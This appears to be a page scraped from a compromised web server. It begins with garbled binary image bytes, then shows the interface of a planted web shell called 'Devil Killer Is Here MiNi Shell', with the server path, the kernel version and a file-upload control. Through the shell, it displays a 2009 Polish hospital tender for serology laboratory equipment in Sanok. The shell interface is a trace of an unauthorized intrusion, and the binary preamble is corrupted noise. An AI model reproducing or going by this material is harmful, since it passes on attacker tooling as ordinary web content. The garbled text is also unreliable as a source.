JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20091012/355518-N-2009.html

<p class="kh_header"><b>Sanok: Dostawa urządzeń - aparatury laboratoryjnej dla Pracowni Serologii  SPZOZ w Sanoku.</b><br>
<b>Numer ogłoszenia: 355518 - 2009; data zamieszczenia: 12.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej , ul. 800-lecia 26, 38-500 Sanok, woj. podkarpackie, tel. 013 4656290, faks 013 4656290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zozsanok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa urządzeń - aparatury laboratoryjnej dla Pracowni Serologii  SPZOZ w Sanoku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest jednorazowy zakup wraz z montażem i uruchomieniem fabrycznie  nowego sprzetu medycznego tj. 
-  wirówka laboratoryjna- 1 szt. 
-  cieplarka laboratoryjna- 1 szt.
mikroskopu laboratoryjnego- 1 szt.
wirówka samopłucząca- 1 szt.
łaźnia wodna do rozmrażania osocza - 1 szt.
witryna chłodnicza- 1 szt.
lampy bakteriobójcze-3 szt.
Wspólny Słownik Zamówień 
CPV 33.10.00.00-1 Urządzenia medyczne
CPV 42.93.11.00-2 Wirówki laboratoryjne
CPV 38.51.00.00-3 Mikroskopy
CPV 42.94.30.00-8 Łaźnie termostatyczna
CPV 42.51.32.10-0 Witryny chłodnicze
CPV 31.51.50.00-9 Lampy UV
dla SPZOZ w Sanoku, z podziałem przedmiotu zamówienia na 7 zadania.
Szczegółowy opis, zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załacznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia.
W ramach znaówienia Wykonawca jest zobowiązany do dostraczenia przedmiotu zamówienia (zadanie nr. 1,2,3,4,5,6,7) we własnym zakresie i na własny koszt i ryzyko do siedziby Zamawiającego. 
Oferowany wyrób musi być:
fabrycznie nowy 
rok produkcji 2009
wolny od wad fizycznych i prawnych
dopuszczony do obrotu i używania w Polsce 
odpowiednio oznakowany i posiadać wmagane prawem certyfikaty bezpieczeństwa,
posiadać minimum 24 miesięczną gwarancję
posiadać dokumentację technicza w języku polskim, niezbędną do normalnego korzystania przez Zamawiającego z wyboru, jak: gwarancje, instrukcje, opisy techniczne, schematy, itp.
Warunki gwarancji:
Wykonawca musi objąć sprzęt medyczny (będący przedmiotem postępowania zadanie nr. 1,2,3,4,5,6,7 )  gwarancją, która w szczególności będzie zawierać zobowiązanie Wykonawcy do zagwarantowania co najmniej:  
-okres obowiązywania gwarancji: gwarancja biegnie od dnia instalacji i uruchomienia (stwierdzonego protokołem technicznego przekazania - odbioru) i kończy się z upływem  - 24 miesięcy. Szczegółowe warunki gwarancji zawiera załącznik nr.5  do SIWZ. 
2. Zamawiający dopuszcza możliwość składania ofert równoważnych tj. innych niż wskazane          w siwz pod warunkiem, że zaproponowane zamienniki będą równoważne pod względem parametrów technicznych, eksploatacyjnych i użytkowych. Zamawiający zastrzega sobie prawo żądania udzielenia przez Wykonawcę wyjaśnień dotyczących treści złożonej oferty, w szczególności wykazania przez Wykonawcę, iż wyrób przez niego zaproponowany jest istotnie równoważny z wymaganym przedstawionym w opisie przedmiotu zamówienia.
3. Warunki realizacji zamówienia zostały zawarte we wzorze umowy stanowiącym integralną część SIWZ.
Dopuszcza się składanie ofert na poszczególne zadania:
Zadanie nr 1 - dostawa wraz z montażem i uruchomieniem jednej wirówki laboratoryjnej ,wg CPV 42.93.11.00-2 wirówki laboratoryjne, którego szczegółowy opis zawarty jest w  załączniku nr 2. 
Zadanie nr 2 - dostawa wraz z montażem i uruchomieniem jednej cieplarki laboratoryjnej ,wg CPV 33.10.00.00-1 Urządzenia medyczne, którego szczegółowy opis zawarty jest w  załączniku nr 2. 
Zadanie nr 3 - dostawa wraz z montażem i uruchomieniem jednego mikroskopu laboratoryjnego, wg CPV 38.51.00.00-3 Mikroskopy, którego szczegółowy opis zawarty jest w  załączniku nr 2. 
Zadanie nr 4 - dostawa wraz z montażem i uruchomieniem jednej wirówki samopłuczącej ,wg CPV 42.93.11.00-2 Wirówka laboratoryjne, którego szczegółowy opis zawarty jest w  załączniku nr 2. 
Zadanie nr 5 - dostawa wraz z montażem i uruchomieniem jednej łaźni wodnej do rozmrażania osocza, wg  CPV 42.94.30.00-8 Łaźnie termostatyczna, którego szczegółowy opis zawarty jest w  załączniku nr 2. 
Zadanie nr 6 - dostawa wraz z montażem i uruchomieniem jednej witryny chłodniczej ,wg CPV 42.51.32.10-0 Witryny chłodnicze, którego szczegółowy opis zawarty jest w  załączniku nr 2. 
Zadanie nr 7 -dostawa trzech sztuk lamp bakteriobójczych przepływowych ,wg CPV 31.51.50.00-9 Lampy UV, którego szczegółowy opis zawarty jest w  załączniku nr 2..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 42.93.11.00-2, 38.51.00.00-3, 42.94.30.00-8, 42.51.32.10-0, 31.51.50.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Obowiązek wniesienia wadium. Przystępując do przetargu wykonawca jest zobowiązany wnieść wadium w wysokości :
zadanie nr 1-  85,00 zł
zadanie nr 2-  52,00 zł
zadanie nr 3-  75,00 zł
zadanie nr 4-  355,00 zł
zadanie nr 5-  20,00 zł
zadanie nr 6-  39,00 zł
zadanie nr 7-  32,00 zł

2.  Forma wniesienia wadium.
Wadium może być wniesione w następujących formach :
1.pieniądzu,
2.poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,        
3.gwarancjach bankowych,
4.gwarancjach ubezpieczeniowych,
5.poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy              z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 

1.      Termin i sposób wniesienia wadium w pieniądzu.
Płatne do dnia 21.10.2009 r. do godz. 10.00, z dopiskiem 
,,Wadium nr   SPZOZ/PN/82/2009.
na konto Zamawiającego Podkarpacki Bank Spółdzielczy Oddział w Sanoku nr 58 8642 0002 2001 0060 1685 0004 
		Do potwierdzenia kopią dowodu wpłaty
2.	Termin i sposób wniesienia wadium w innej formie.
Inne  dokumenty wniesienia wadium (poręczenia, gwarancje, itp.) należy dostarczyć do siedziby zamawiającego w kopercie z dopiskiem  ,, Wadium nr SPZOZ/PN/82/2009 , nie później jednak niż do dnia 21.10.2009 r. do godz. 10.00  i złożyć w Sekretariacie SPZOZ Sanok       
Kopię w/w dokumentu należy załączyć do oferty (jako załącznik)	
Oferta nie zabezpieczona wadium w wymaganej formie zostanie odrzucona bez rozpatrywania.	
3.   Informacje dodatkowe o wadium:
a)Wadium wnosi się przed upływem terminu składania ofert. W przypadku wnoszenia wadium          w formie pieniężnej za termin wniesienia wadium przyjmuje się datę uznania rachunku bankowego zamawiającego.
b) Wadium będzie zwrócone w terminie i na warunkach wskazanych w art. 46 ustawy - prawo zamówień publicznych z dnia 29 stycznia 2004 roku. W przypadku wadium wniesionego                    w pieniądzu zwrot nastąpi przelewem na rachunek bankowy wskazany na piśmie przez Wykonawcę, a wniesionego w innej formie - w kasie Zamawiającego.
c) Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego, przy czym data wpływu pieniędzy na rachunek zamawiającego, jest uznana jako data wpłacenia wadium.
4. Zwrot wadium nastąpi, jeśli zaistnieje jedna z poniższych okoliczności:
a) upłynął termin związania ofertą,
b) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
c) zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia,
d) na wniosek wykonawcy,  który wycofał ofertę przed upływem terminu składania ofert,
e) na wniosek wykonawcy,  który został wykluczony z postępowania,
f) na wniosek wykonawcy,  którego oferta została odrzucona
5. Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli:
 1) wykonawca, którego oferta została wybrana :
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) nie wniesie wymaganego zabezpieczenia należytego wyko­nania umowy,
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy
2) wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3, nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust.1 lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie	                      
W ofercie należy podać numer konta, na jakie Zamawiający dokonuje zwrotu wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zgodnie z art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:      
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy    nakładają obowiązek posiadania takich uprawnień;
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, 

5. Zamawiający ustala następujące szczegółowe warunki udziału w Postępowaniu:
5.1. Wykonawca zaoferuje urządzenie określone w zadaniu 1,2,3,4,5,6,7   zgodne z przepisami obowiązującymi w tym zakresie, na terenie Polski.  
5.2. Wykonawca zaoferuje 30 dniowy termin płatności za sprzęt medyczny licząc od daty otrzymania przez Zamawiającego prawidłowej faktury VAT wystawionej przez Wykonawcę na podstawie podpisanego przez strony bez zastrzeżeń protokołu odbioru technicznego sprzętu.
5.3.Wykonawca udzieli 24 miesięcznej gwarancji na oferowany sprzęt medyczny.

Sposób oceny: Warunki podane w pkt. 1),2),3),4),5.1), 5.2),5.3.) zostaną ocenione w systemie spełnia - nie spełnia  na podstawie przedłożonych oświadczeń i dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Druki, które należy wypełnić i podpisać (wyłącznie przez osoby uprawnione               do reprezentowania firmy), załączyć do oferty:
a)Formularz ofertowy - zał. nr 1
b)Zestawienie wymaganych parametrów techniczno-użytkowych zał.Nr.2
c)Oświadczenie zgodne z wymogami art. 22 Ustawy - zał. Nr 3
d)Oświadczenie dotyczące dopuszczenia do obrotu -  zał. nr 4
e)Parafowany wzór umowy- zał. Nr 6
f)   Formularz - warunki gwarancji - zał nr 5,
2. Oświadczenia oraz dokumenty, które należy złożyć w oryginałach, ewentualnie w odpisach lub kserokopiach poświadczonych za zgodność z oryginałem przez Wykonawcę (osoba/osoby uprawniona/e do reprezentowania firmy):
W przypadku podmiotów ubiegających się wspólnie o udzielenie zamówienia (konsorcjum, spółki   cywilnej), każdy z wykonawców wchodzących w skład konsorcjum lub wspólników spółki cywilnej musi udokumentować spełnianie warunków o jakich mowa w części XI SIWZ. tj. posiadanie uprawnień do wykonywania określonej działalności lub czynności i nie podlegania wykluczeniu          z postępowania.  Przy ocenie spełniania warunków, o których mowa w art. 22 ust. 1 pkt. 2 i 3 ustawy Pzp, będzie brany pod uwagę łączny potencjał  techniczny i kadrowy wykonawców, ich łączne kwalifikacje, doświadczenie oraz łączna sytuacja ekonomiczna i finansowa. Dopuszcza się możliwość składania wspólnych oświadczeń wykonawców wspólnie ubiegających się o udzielenie zamówienia potwierdzających, że razem spełniają warunki udziału w postępowaniu.

2.1) Oświadczenie o spełnianiu warunków określonych przepisami art. 22 ust.1 ustawy Prawo zamówień publicznych oraz o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy oraz o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 ustawy pzp
2.2) Oświadczenie dotyczące dopuszczenia do obrotu i użytkowania zaoferowanych wyrobów na terenie Polski.
2.3) Wymagane dokumenty na potwierdzenie, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych: 
a) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

W przypadku podmiotów wspólnie ubiegających sie o udzielenie zamówienia (konsorcjum, spółka cywilna):  
 - należy przedłożyć oryginał pełnomocnictwa (pełnomocnictw) udzielonego (y-ch) przez wszystkich wspólników spółki cywilnej lub przez wszystkich członków konsorcjum do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia - jeżeli wspólną ofertę składają podmioty prowadzące działalność w formie spółki cywilnej lub powołano konsorcjum dla wykonania zamówienia  (zgodnie z art. 23 ust. 2 pzp). Umocowanie może także wynikać z treści umowy konsorcjum lub treści umowy spółki cywilnej 
2.4) wymagane dokumenty na potwierdzenie opisanego przez zamawiającego warunku
znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia:
Zamawiający nie wymaga przedstawienia dokumentów na potwierdzenie spełniania tego warunku.
2.5)  wymagane dokumenty na potwierdzenie opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:
Zamawiający nie wymaga przedstawienia dokumentów na potwierdzenie spełniania tego warunku.
2.6) Wymagane dokumenty na potwierdzenie, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego:
1. Zaświadczenie podmiotu uprawnionego do kontroli jakości, potwierdzającego, że dostarczone  wyroby odpowiadają określonym normom lub specyfikacjom technicznym zgodnie z ustawą z dnia 20 kwietnia 2004 r. o wyrobach medycznych (Dz. U.z 2004 r., nr 93, poz. 896 ) tj odpowiednio:
a)  dla wszystkich klas wyrobu medycznego - odpowiednia deklaracja zgodności,
b) dla  następujących klas wyrobu medycznego: klasa I sterylne, klasa I z funkcją pomiarową,      klasa IIa, klasa IIB, klasa III - certyfikat zgodności wyrobu z wymaganiami zasadniczymi dla danych wyrobów medycznych wydany przez uprawnioną jednostkę notyfikowaną
c) dla wszystkich klas wyrobu medycznego, za wyjątkiem klasy I i IIa gdy pierwsze jego wprowadzenie do obrotu i stosowania nastąpiło w innym niż Polska kraju Unii Europejskiej            ( w takim przypadku należy złożyć stosowne oświadczenie), zgodnie z przepisami powołanej na wstępie ustawy o wyrobach medycznych - świadectwo zgłoszenia (wpis) w Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych
d)w przypadku produktów, które nie podlegają przepisom ustawy z dnia 20 kwietnia 2004 r. o wyrobach medycznych (Dz. U.z 2004 r., nr 93, poz. 896 ), należy przedłożyć odpowiednie dokumenty dopuszczające dany produkt do obrotu i stosowania, jeżeli przepisy tego wymagają.
2. Aktualny opis przedmiotu zamówienia, jak: katalogi (karty katalogowe) w języku polskim lub w języku obcym z tłumaczeniem poświadczonym przez Wykonawcę, foldery, ulotki informacyjne,  itp.
2.7) WYKONAWCA zamieszkały poza terytorium Rzeczpospolitej Polskiej:a) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 2.3 a) składa odpowiedni dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, zgodnie z § 2 Rozporządzenia Prezesa Rady Ministrów  z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U.z 2006 r.,  Nr 87, poz. 605) wraz ze zmianami wprowadzonymi Rozporządzeniem Prezesa Rady ministrów  dnia 16 października 2008 r. zmieniającym rozporządzenie w sprawie dokumentów jakich może żadać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane (DZ. U.  Z 2008 nr 188 poz. 1155)  tj. dokumenty potwierdzające, że:
nie otwarto jego likwidacji ani nie ogłoszono jego upadłości (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
nie zalega z uiszczeniem  podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, ze uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu(wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert),
 nie orzeczono wobec niego zakazu ubiegania sie o zamówienie(wystawione nie wcześniej    niż 6 miesięcy przed upływem terminu składania ofert).
Powyższe dokumenty winny być złożone wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zozsanok.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Budynek Administracji SPZOZ w Sanoku ul. 800-lecia 26-  POK. NR 15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2009 godzina 10:00, miejsce: Budynek Administracji SPZOZ w Sanoku ul. 800-lecia 26 - SEKRETRIAT.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa wraz z montażem i uruchomieniem jednej wirówki laboratoryjne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa wraz z montażem i uruchomieniem jednej wirówki laboratoryjnej , której szczegółowy opis zawarty jest w  załączniku nr 2. do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.93.11.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa wraz z montażem i uruchomieniem jednej cieplarki laboratoryjnej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa wraz z montażem i uruchomieniem jednej cieplarki laboratoryjnej  której szczegółowy opis zawarty jest w  załączniku nr 2. do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa wraz z montażem i uruchomieniem jednego mikroskopu laboratoryjnego,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa wraz z montażem i uruchomieniem jednego mikroskopu laboratoryjnego,   którego szczegółowy opis zawarty jest w  załączniku nr 2. do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.51.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> dostawa wraz z montażem i uruchomieniem jednej wirówki samopłuczącej ,wg CPV 42.93.11.00-2 Wirówka laboratoryjne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa wraz z montażem i uruchomieniem jednej wirówki samopłuczącej której szczegółowy opis zawarty jest w  załączniku nr 2. do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.93.11.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> dostawa wraz z montażem i uruchomieniem jednej łaźni wodnej do rozmrażania osocza,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa wraz z montażem i uruchomieniem jednej łaźni wodnej do rozmrażania osocza, której szczegółowy opis zawarty jest w  załączniku nr 2. do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.94.30.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> dostawa wraz z montażem i uruchomieniem jednej witryny chłodniczej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa wraz z montażem i uruchomieniem jednej witryny chłodniczej  której szczegółowy opis zawarty jest w  załączniku nr 2. do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.51.32.10-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
